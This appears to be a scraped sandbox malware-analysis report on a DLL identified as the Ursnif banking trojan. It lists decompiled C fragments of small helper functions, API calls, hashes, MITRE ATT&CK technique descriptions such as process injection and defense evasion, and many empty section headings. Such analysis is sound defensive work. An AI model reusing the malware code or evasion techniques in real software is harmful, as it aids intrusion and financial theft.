Instruction ID: 1f555a964efebd6ba54d4dd80e8f621ecb96f2f4f4a1f0ec344837d9581dbec7
Opcode Fuzzy Hash: 01ddd44e86983925fbb506eaee42202db2b1bd29205a15ca5d46df397d65174d
Instruction Fuzzy Hash: 53F01CF1B002199BE7209B78AD08B0637DCAB86BA17054110B901D35A4DAA0E800F9B0

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA302, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FAA302(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xfad2d4; // 0x3a49630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xfad2d4; // 0x3a49630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xfad030) {
					HeapFree( *0xfad1f0, 0, _t8);
				}
				_t14[1] = E00FA83FE(_v0, _t14);
				_t11 =  *0xfad2d4; // 0x3a49630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00faa302
0x00faa302
0x00faa30b
0x00faa31b
0x00faa31b
0x00faa320
0x00faa325
0x00000000
0x00000000
0x00faa315
0x00faa315
0x00faa327
0x00faa32b
0x00faa33d
0x00faa33d
0x00faa34d
0x00faa350
0x00faa355
0x00faa359
0x00faa35f

APIs

RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FAA30B
Sleep.KERNEL32(0000000A,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FAA315
HeapFree.KERNEL32(00000000,00000000,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FAA33D
RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FAA359

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a53ffb7b8757e1b7f2a2ba75b6dfcd82e9d236a1d6abece5827caccabcdf48bd
Instruction ID: 142c5dcd590901ee7a0448176ed29a49219c24860490149db9f1258997e72e61
Opcode Fuzzy Hash: a53ffb7b8757e1b7f2a2ba75b6dfcd82e9d236a1d6abece5827caccabcdf48bd
Instruction Fuzzy Hash: DCF0F2F5611345DBEB209F69ED48F1A37A8AF03745B048404F486CB661C734EC01FBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6BB2, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00FA6BB2() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xfad2d4; // 0x3a49630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xfad2d4; // 0x3a49630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xfad2d4; // 0x3a49630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xfae882) {
					HeapFree( *0xfad1f0, 0, _t10);
					_t7 =  *0xfad2d4; // 0x3a49630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00fa6bb2
0x00fa6bbb
0x00fa6bcb
0x00fa6bcb
0x00fa6bd0
0x00fa6bd5
0x00000000
0x00000000
0x00fa6bc5
0x00fa6bc5
0x00fa6bd7
0x00fa6bdc
0x00fa6be0
0x00fa6bf3
0x00fa6bf9
0x00fa6bf9
0x00fa6c02
0x00fa6c04
0x00fa6c08
0x00fa6c0e

APIs

RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA6BBB
Sleep.KERNEL32(0000000A,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA6BC5
HeapFree.KERNEL32(00000000,?,?,?,00FA7260,?,?,?,?,?,00FA258B,?,00000001), ref: 00FA6BF3
RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA6C08

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 25341239371a77441e1b47187316ef5f29dbca772a8521b1014ac65417f83472
Instruction ID: a02165471c72e058b584451b3439e6711c2ceeaae75d43e091c84b2802d15674
Opcode Fuzzy Hash: 25341239371a77441e1b47187316ef5f29dbca772a8521b1014ac65417f83472
Instruction Fuzzy Hash: 98F0D4F460120AEFE7188B29DD89F2937A4AB46780B084418E443C7770C634EC01FB70

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA586, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FAA586(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00FA550F(_t2);
				if(_t34 != 0) {
					_t30 = E00FA550F(_t28);
					if(_t30 == 0) {
						E00FAA07B(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00FAA987(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00FAA987(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00faa586
0x00faa590
0x00faa592
0x00faa598
0x00faa598
0x00faa5a1
0x00faa5a5
0x00faa5b1
0x00faa5b5
0x00faa629
0x00faa5b7
0x00faa5b7
0x00faa5bb
0x00faa5c2
0x00faa5c5
0x00faa5df
0x00faa5ce
0x00faa5ce
0x00faa5d2
0x00faa5d5
0x00faa5da
0x00faa5da
0x00faa5e4
0x00faa60c
0x00faa612
0x00faa615
0x00faa5e6
0x00faa5e8
0x00faa5f0
0x00faa5fb
0x00faa600
0x00faa600
0x00faa61c
0x00faa623
0x00faa624
0x00faa624
0x00faa5b5
0x00faa634

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278,?,03A49698), ref: 00FAA592

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

Part of subcall function 00FAA987: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00FAA5C0,00000000,00000001,00000001,?,?,00FA9F48,00000000,00000000,00000000,03A49698), ref: 00FAA995
Part of subcall function 00FAA987: StrChrA.SHLWAPI(?,0000003F,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278,?,03A49698,0000EA60,?), ref: 00FAA99F

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00FA9F48,00000000,00000000,00000000,03A49698,?,?,00FAA278), ref: 00FAA5F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA600
lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA60C

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: ec0dcfe4acaf83da11226839b6c777398b4d0534c8c73c40b14c58531ab6bf4c
Instruction ID: b8d5771c40c0d483d37edefb546cde80c187587a0dbc5509f29ccfd87f73416d
Opcode Fuzzy Hash: ec0dcfe4acaf83da11226839b6c777398b4d0534c8c73c40b14c58531ab6bf4c
Instruction Fuzzy Hash: 492175B2904259EFCB11AF64CC44A9F7FA99F0B794F198054F8059B211D735DD08EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7502, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA7502(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00FA550F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00fa7517
0x00fa751b
0x00fa7525
0x00fa752c
0x00fa752f
0x00fa7531
0x00fa7539
0x00fa753e
0x00fa754c
0x00fa7551
0x00fa755b

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,03A4931C,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7512
lstrlenW.KERNEL32(00FA4BA1,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7519

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00FA4BA1,004F0053,03A4931C,?,?,?,?,?,?,00FA9CB1), ref: 00FA7539
memcpy.NTDLL(73B769A0,00FA4BA1,00000002,00000000,004F0053,73B769A0,?,?,00FA4BA1,004F0053,03A4931C), ref: 00FA754C

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: ff60f635a6c328546f8fe6f25c0c15267f0462a7c7e625f63831176998d7e4aa
Instruction ID: 8f139b8730edde251c3bf07579ae9138d02579e106609d6a44bcf8602a8cbbd2
Opcode Fuzzy Hash: ff60f635a6c328546f8fe6f25c0c15267f0462a7c7e625f63831176998d7e4aa
Instruction Fuzzy Hash: 9BF0EC76900118BFCB15EFA9CC45C9B7BADEE0A3947154066B908D7111E635EA14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9FA4, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
lstrlen.KERNEL32(?), ref: 00FA9FB8

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: e75bc346d48aa0ca7a354241610a6f8b8b6d1ad45711f5d3ae659c62b3d749c4
Instruction ID: 3f16759439178f539d66920f73ba76c88ba0d475abdc294bfc357445ef851968
Opcode Fuzzy Hash: e75bc346d48aa0ca7a354241610a6f8b8b6d1ad45711f5d3ae659c62b3d749c4
Instruction Fuzzy Hash: 39E04873809625EF87126FA49C08C8FBBA9FFCA760B058915F544D3124CB35D815EBD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2e.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00FA7DD8, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 10001000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Function 00FA7925, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 10001C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 10001B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 10001252, Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Function 10001AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00FA90BA, Relevance: 33.3, APIs: 22, Instructions: 266
memorystringCOMMON

Function 00FA9C23, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 00FA24C2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Function 10001DBD, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00FA6D4A, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 10001792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 00FA707F, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Function 00FA6E28, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 1000146A, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 10001314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 100018B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 00FA4C35, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 1000116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Function 00FA4B22, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 00FA7790, Relevance: 4.6, APIs: 3, Instructions: 83
memoryCOMMON

Function 10001CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Function 00FA3F83, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Function 00FAA881, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 00FA974B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 00FAA53C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 100015F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 00FA4F6C, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 00FA8393, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Function 00FA98B3, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON